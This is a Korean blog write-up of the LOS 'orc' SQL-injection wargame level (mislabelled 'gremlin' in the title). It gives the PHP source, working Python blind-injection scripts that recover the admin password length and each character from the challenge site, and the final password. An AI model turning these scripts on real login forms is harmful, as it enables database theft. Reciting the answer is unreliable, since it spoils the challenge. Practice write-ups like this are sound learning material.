[LOS] gremlin 풀이

 

PHP & query 

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  $query = "select id from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello admin</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orc"); 
  highlight_file(__FILE__); 
?>

 

select id from prob_orc where id='admin' and pw=''

 

문제 풀이

더보기

solve 조건

if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orc");

정확한 pw값를 알아내야 해결할 수 있다.

 

Blind Injection

 

Blind Injection은 SQL Injection 공격 시 오류메세지가 출력되지 않을 때 참/거짓을 통해 원하는 DB 정보를 얻어내는 공격기법이다.

 

해당 문제에서는 블라인들 인젝션을 요구하고 있다.

먼저 참/거짓을 판단할 수 있는 구문을 탐색한다.

 

if($result['id']) echo "<h2>Hello admin</h2>"; 

 해당 구문을 보자 id값이 있기만하면 Hello admin을 출력해주고 있다. 이를 이용하여 참/거짓을 판단한다.

select id from prob_orc where id='admin' and pw='' or 수식

 id='admin' and pw=''무조건 거짓이다 뒤 수식의 여부에따라 Hello admin을 출력해 줄것이다.

 

직접 하면 시간이 오래걸리니 Python Code로 작성한다.

 

길이알아내기

import requests

URL='https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php'
headers = {'Content-Type': 'application/json; charset=utf-8'}
cookies = {'PHPSESSID': '내쿠기값'}
password = ''

for i in range(100):
    query={'pw': '\' or length(pw) = '+str(i)+' # '}
    res=requests.get(URL, params=query, headers=headers, cookies=cookies)
    if('Hello admin' in res.text):
        print(i)


select id from prob_orc where id='admin' and pw='' or length(pw) = 숫자

해당 쿼리문을 넘겨주는 파이썬 코드이다. length(pw) = 숫자가 이라면 Hello admin을 출력할 것이다. 

4와 8을 출력한다. pw의 길이는 4와 8중에 하나이다

 

pw알아내기

import requests

URL='https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php'
headers = {'Content-Type': 'application/json; charset=utf-8'}
cookies = {'PHPSESSID': '내쿠기값'}
password = ''

for i in range(8):
    for  j in range(ord('0'),ord('z')+1):
        query={'pw': '\' or substr(pw,'+str(i+1)+',1) = \'' + chr(j) + '\'#' }
        res=requests.get(URL, params=query, headers=headers, cookies=cookies)
        if('Hello admin' in res.text):
            password = password + chr(j)
            print(password)
            break;
select id from prob_orc where id='admin' and pw='' or substr(pw,n번째문자,1)

길이를 8로해서 돌렸다. substr은 문자열을 분리하여 원하는 위치에 문자열을 가져오게 해준다.

 095A9852 값이 나왔다.

 A값이 소문자로 입력해야 정답으로 인정되는데 원인을 아직 모르겠다.

 

URL

los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=095a9852

 

 

 

 

 

'CTF > LOS' 카테고리의 다른 글

[LOS] darkelf 풀이 - 6번  (0) 2020.09.15
[LOS] wolfman 풀이 - 5번  (0) 2020.09.15
[LOS] goblin 풀이 3번  (0) 2020.09.15
[LOS] cobolt 풀이 - 2번  (0) 2020.09.15
[LOS] gremlin 풀이 - 1번  (0) 2020.09.15

+ Recent posts